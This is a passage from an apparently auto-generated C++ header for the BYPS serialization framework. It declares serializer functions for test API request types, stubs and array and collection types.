void BSerializer_56305539(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.remote.BRequest_RemoteListTypes_setObj1
void BSerializer_136654324(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.remote.BRequest_RemoteListTypes_setPrimitiveTypes1
void BSerializer_759940243(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.remote.BRequest_RemoteListTypes_setShort1
void BSerializer_1939453607(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.remote.BRequest_RemoteListTypes_setString1
void BSerializer_339567886(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.remote.BRequest_RemoteMapTypes_getBoolean1
void BSerializer_885803255(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.remote.BRequest_RemoteMapTypes_getByte1
void BSerializer_124722647(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.remote.BRequest_RemoteMapTypes_getByte2
void BSerializer_124722646(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.remote.BRequest_RemoteMapTypes_getChar1
void BSerializer_124323429(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.remote.BRequest_RemoteMapTypes_getDate1
void BSerializer_123590589(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.remote.BRequest_RemoteMapTypes_getDouble1
void BSerializer_1890230400(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.remote.BRequest_RemoteMapTypes_getFloat1
void BSerializer_530925397(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.remote.BRequest_RemoteMapTypes_getInt1
void BSerializer_827458594(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.remote.BRequest_RemoteMapTypes_getInt2
void BSerializer_827458595(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.remote.BRequest_RemoteMapTypes_getLong1
void BSerializer_115791051(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.remote.BRequest_RemoteMapTypes_getObj1
void BSerializer_827625498(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.remote.BRequest_RemoteMapTypes_getPrimitiveTypes1
void BSerializer_1745799327(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.remote.BRequest_RemoteMapTypes_getShort1
void BSerializer_899426613(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.remote.BRequest_RemoteMapTypes_getString1
void BSerializer_1836497856(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.remote.BRequest_RemoteMapTypes_setBoolean1
void BSerializer_974383083(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.remote.BRequest_RemoteMapTypes_setByte1
void BSerializer_685835107(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.remote.BRequest_RemoteMapTypes_setByte2
void BSerializer_685835106(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.remote.BRequest_RemoteMapTypes_setChar1
void BSerializer_685435889(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.remote.BRequest_RemoteMapTypes_setDate1
void BSerializer_684703049(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.remote.BRequest_RemoteMapTypes_setDouble1
void BSerializer_467931660(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.remote.BRequest_RemoteMapTypes_setFloat1
void BSerializer_316308321(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.remote.BRequest_RemoteMapTypes_setInt1
void BSerializer_1407399122(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.remote.BRequest_RemoteMapTypes_setInt2
void BSerializer_1407399121(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.remote.BRequest_RemoteMapTypes_setLong1
void BSerializer_676903511(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.remote.BRequest_RemoteMapTypes_setObj1
void BSerializer_1407232218(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.remote.BRequest_RemoteMapTypes_setPrimitiveTypes1
void BSerializer_1629134317(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.remote.BRequest_RemoteMapTypes_setShort1
void BSerializer_684809537(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.remote.BRequest_RemoteMapTypes_setString1
void BSerializer_100307380(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.remote.BRequest_RemotePrimitiveTypes_add
void BSerializer_362528512(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.remote.BRequest_RemotePrimitiveTypes_getBool
void BSerializer_1816157633(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.remote.BRequest_RemotePrimitiveTypes_getByte
void BSerializer_1816147875(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.remote.BRequest_RemotePrimitiveTypes_getChar
void BSerializer_1816134997(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.remote.BRequest_RemotePrimitiveTypes_getDate
void BSerializer_1816111357(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.remote.BRequest_RemotePrimitiveTypes_getDeferredValueFromServer
void BSerializer_547282058(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.remote.BRequest_RemotePrimitiveTypes_getDouble
void BSerializer_1513332250(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.remote.BRequest_RemotePrimitiveTypes_getFloat
void BSerializer_462707289(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.remote.BRequest_RemotePrimitiveTypes_getInt
void BSerializer_1582599686(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.remote.BRequest_RemotePrimitiveTypes_getLong
void BSerializer_1815859759(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.remote.BRequest_RemotePrimitiveTypes_getObject
void BSerializer_1210742444(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.remote.BRequest_RemotePrimitiveTypes_getPrimitiveTypes
void BSerializer_714626279(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.remote.BRequest_RemotePrimitiveTypes_getShort
void BSerializer_450820153(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.remote.BRequest_RemotePrimitiveTypes_getString
void BSerializer_1079359962(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.remote.BRequest_RemotePrimitiveTypes_makeDate
void BSerializer_1918934973(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.remote.BRequest_RemotePrimitiveTypes_parseDate
void BSerializer_578007072(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.remote.BRequest_RemotePrimitiveTypes_sendAllTypes
void BSerializer_677876863(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.remote.BRequest_RemotePrimitiveTypes_setBool
void BSerializer_243951947(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.remote.BRequest_RemotePrimitiveTypes_setByte
void BSerializer_243961705(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.remote.BRequest_RemotePrimitiveTypes_setChar
void BSerializer_243974583(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.remote.BRequest_RemotePrimitiveTypes_setDate
void BSerializer_243998223(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.remote.BRequest_RemotePrimitiveTypes_setDouble
void BSerializer_1727949326(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.remote.BRequest_RemotePrimitiveTypes_setFloat
void BSerializer_1023819749(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.remote.BRequest_RemotePrimitiveTypes_setInt
void BSerializer_1239049874(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.remote.BRequest_RemotePrimitiveTypes_setLong
void BSerializer_244249821(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.remote.BRequest_RemotePrimitiveTypes_setObject
void BSerializer_1425359520(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.remote.BRequest_RemotePrimitiveTypes_setPrimitiveTypes
void BSerializer_225526541(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.remote.BRequest_RemotePrimitiveTypes_setShort
void BSerializer_1011932613(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.remote.BRequest_RemotePrimitiveTypes_setString
void BSerializer_1293977038(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.remote.BRequest_RemotePrimitiveTypes_throwException
void BSerializer_1278149706(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.remote.BRequest_RemotePrimitiveTypes_voidFunctionVoid
void BSerializer_2033139391(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.remote.BRequest_RemoteProcessingEx_getValueAfterProcessingExceptions
void BSerializer_1155485035(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.remote.BRequest_RemoteReferences_getNode
void BSerializer_1366991859(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.remote.BRequest_RemoteReferences_setNode
void BSerializer_693117721(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.remote.BRequest_RemoteServerCtrl_getPublishedRemote
void BSerializer_648762723(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.remote.BRequest_RemoteServerCtrl_publishRemote
void BSerializer_1543768912(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.remote.BRequest_RemoteServerCtrl_removePublishedRemote
void BSerializer_135366859(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.remote.BRequest_RemoteSetTypes_getBoolean1
void BSerializer_2114990909(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.remote.BRequest_RemoteSetTypes_getByte1
void BSerializer_901695825(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.remote.BRequest_RemoteSetTypes_getByte2
void BSerializer_901695824(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.remote.BRequest_RemoteSetTypes_getChar1
void BSerializer_901296607(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.remote.BRequest_RemoteSetTypes_getDate1
void BSerializer_900563767(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.remote.BRequest_RemoteSetTypes_getDouble1
void BSerializer_1751651450(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.remote.BRequest_RemoteSetTypes_getFloat1
void BSerializer_2080406641(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.remote.BRequest_RemoteSetTypes_getInt1
void BSerializer_1772226268(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.remote.BRequest_RemoteSetTypes_getInt2
void BSerializer_1772226269(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.remote.BRequest_RemoteSetTypes_getLong1
void BSerializer_892764229(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.remote.BRequest_RemoteSetTypes_getObj1
void BSerializer_1772393172(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.remote.BRequest_RemoteSetTypes_getPrimitiveTypes1
void BSerializer_669274715(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.remote.BRequest_RemoteSetTypes_getShort1
void BSerializer_1711905425(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.remote.BRequest_RemoteSetTypes_getString1
void BSerializer_1183412410(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.remote.BRequest_RemoteSetTypes_setBoolean1
void BSerializer_2091396559(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.remote.BRequest_RemoteSetTypes_setByte1
void BSerializer_1462808285(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.remote.BRequest_RemoteSetTypes_setByte2
void BSerializer_1462808284(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.remote.BRequest_RemoteSetTypes_setChar1
void BSerializer_1462409067(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.remote.BRequest_RemoteSetTypes_setDate1
void BSerializer_1461676227(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.remote.BRequest_RemoteSetTypes_setDouble1
void BSerializer_185153786(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.remote.BRequest_RemoteSetTypes_setFloat1
void BSerializer_1999943579(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.remote.BRequest_RemoteSetTypes_setInt1
void BSerializer_462631448(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.remote.BRequest_RemoteSetTypes_setInt2
void BSerializer_462631447(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.remote.BRequest_RemoteSetTypes_setLong1
void BSerializer_1453876689(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.remote.BRequest_RemoteSetTypes_setObj1
void BSerializer_462464544(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.remote.BRequest_RemoteSetTypes_setPrimitiveTypes1
void BSerializer_250758937(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.remote.BRequest_RemoteSetTypes_setShort1
void BSerializer_1926522501(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.remote.BRequest_RemoteSetTypes_setString1
void BSerializer_753392826(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.remote.BRequest_RemoteStreams_getImage
void BSerializer_61677379(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.remote.BRequest_RemoteStreams_getImages
void BSerializer_1911998634(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.remote.BRequest_RemoteStreams_getSharedStream
void BSerializer_1652400477(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.remote.BRequest_RemoteStreams_getStreamDeferedProperies
void BSerializer_1205766796(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.remote.BRequest_RemoteStreams_getStreamDoNotClone
void BSerializer_692369677(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.remote.BRequest_RemoteStreams_getTextStream
void BSerializer_818823403(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.remote.BRequest_RemoteStreams_getVideoCheckSupportByteRange
void BSerializer_1006919505(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.remote.BRequest_RemoteStreams_putSharedStream
void BSerializer_468339492(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.remote.BRequest_RemoteStreams_setImage
void BSerializer_622789839(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.remote.BRequest_RemoteStreams_setImages
void BSerializer_2126615710(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.remote.BRequest_RemoteStreams_setStreamDoNotMaterialize
void BSerializer_199832593(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.remote.BRequest_RemoteStreams_throwLastException
void BSerializer_2127402965(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.remote.BRequest_RemoteWithAuthentication_doit
void BSerializer_1251509013(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.remote.BRequest_RemoteWithAuthentication_expire
void BSerializer_72176172(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.remote.BRequest_RemoteWithAuthentication_login
void BSerializer_134687724(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.remote.BRequest_RemoteWithAuthentication_setReloginCount
void BSerializer_802968058(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.remote.BRequest_RemoteWithAuthentication_setUseAuthentication
void BSerializer_946544530(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.remote.BStub_RemoteArrayTypes1dim
void BSerializer_123123(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.remote.BStub_RemoteArrayTypes23
void BSerializer_769717182(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.remote.BStub_RemoteArrayTypes4dim
void BSerializer_963726955(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.remote.BStub_RemoteConstants
void BSerializer_2045242510(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.remote.BStub_RemoteEnums
void BSerializer_485761455(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.remote.BStub_RemoteInlineInstance
void BSerializer_567395951(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.remote.BStub_RemoteListTypes
void BSerializer_1233438138(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.remote.BStub_RemoteMapTypes
void BSerializer_664304990(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.remote.BStub_RemotePrimitiveTypes
void BSerializer_456456(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.remote.BStub_RemoteProcessingEx
void BSerializer_790485113(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.remote.BStub_RemoteReferences
void BSerializer_568637225(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.remote.BStub_RemoteServerCtrl
void BSerializer_1652234479(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.remote.BStub_RemoteSetTypes
void BSerializer_1900796440(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.remote.BStub_RemoteStreams
void BSerializer_1043578866(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.remote.BStub_RemoteWithAuthentication
void BSerializer_1983670399(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.set.SetTypes
void BSerializer_5001(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.srvr.BRequest_ClientIF_getStreams
void BSerializer_1654980071(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.srvr.BRequest_ClientIF_incrementInt
void BSerializer_1685952420(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.srvr.BRequest_ClientIF_putStreams
void BSerializer_2016865344(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.srvr.BRequest_ClientIF_sendChat
void BSerializer_41050276(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.srvr.BRequest_ServerIF_callClientIncrementInt
void BSerializer_389860173(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.srvr.BRequest_ServerIF_callClientParallel
void BSerializer_772308436(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.srvr.BRequest_ServerIF_getClient
void BSerializer_190669475(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.srvr.BRequest_ServerIF_getClientIds
void BSerializer_2007476251(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.srvr.BRequest_ServerIF_getPartner
void BSerializer_1025664374(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.srvr.BRequest_ServerIF_getStreamsFromClient
void BSerializer_1679867754(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.srvr.BRequest_ServerIF_putStreamsOnClient
void BSerializer_1934886286(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.srvr.BRequest_ServerIF_registerWithClientMap
void BSerializer_1533268444(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.srvr.BRequest_ServerIF_setPartner
void BSerializer_1332497686(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.srvr.BStub_ClientIF
void BSerializer_2049072174(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.srvr.BStub_ServerIF
void BSerializer_1775199834(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.srvr.ChatStructure
void BSerializer_7007(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.strm.Stream1
void BSerializer_1541129345(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.ver.BRequest_EvolveIF_getClient
void BSerializer_1212621223(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.ver.BRequest_EvolveIF_getEvolve
void BSerializer_1279300441(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.ver.BRequest_EvolveIF_sendEvolveToClient
void BSerializer_714115141(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.ver.BRequest_EvolveIF_setClient
void BSerializer_998004147(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.ver.BRequest_EvolveIF_setEvolve
void BSerializer_1064683365(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.ver.BStub_EvolveIF
void BSerializer_15377840(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.ver.Evolve
void BSerializer_1391985860(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.ver.Evolve2
void BSerializer_573592593(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byte[]
void BSerializer_1374008726(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byte[][][][]
void BSerializer_1201775504(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for char[]
void BSerializer_1361632968(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for char[][][][]
void BSerializer_769021986(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for double[]
void BSerializer_1359468275(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for double[][][][]
void BSerializer_2087445849(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for float[]
void BSerializer_766441794(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for float[][][][]
void BSerializer_1516687588(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for int[]
void BSerializer_100361105(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for int[][]
void BSerializer_1957744307(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for int[][][]
void BSerializer_196606293(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for int[][][][]
void BSerializer_39910537(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for java.io.InputStream[]
void BSerializer_1950626768(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for java.lang.Object[]
void BSerializer_183594037(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for java.lang.Object[][]
void BSerializer_340213335(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for java.lang.Object[][][]
void BSerializer_527503353(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for java.lang.Object[][][][]
void BSerializer_124584219(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for java.lang.String[]
void BSerializer_1888107655(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for java.lang.String[][]
void BSerializer_1995260457(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for java.lang.String[][][]
void BSerializer_1889888075(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for java.lang.String[][][][]
void BSerializer_588723219(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for java.util.ArrayList<byps.test.api.enu.EnumPlanets>
void BSerializer_819140569(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for java.util.Date[]
void BSerializer_1406664368(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for java.util.Date[][][][]
void BSerializer_51898890(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for java.util.HashMap<java.lang.Double,java.lang.Byte>
void BSerializer_1972793385(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for java.util.HashSet<java.lang.Byte>
void BSerializer_31512998(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for java.util.List<byps.test.api.inherit.Class1>
void BSerializer_510524840(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for java.util.List<byps.test.api.inl.Point2D>
void BSerializer_2064980445(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for java.util.List<byps.test.api.prim.PrimitiveTypes>
void BSerializer_1596367810(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for java.util.List<byps.test.api.refs.Node>
void BSerializer_1442786648(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for java.util.List<byte[]>
void BSerializer_1174971318(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for java.util.List<int[]>
void BSerializer_1752158699(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for java.util.List<int[][][][]>
void BSerializer_1088217157(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for java.util.List<java.io.InputStream>
void BSerializer_1218831438(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
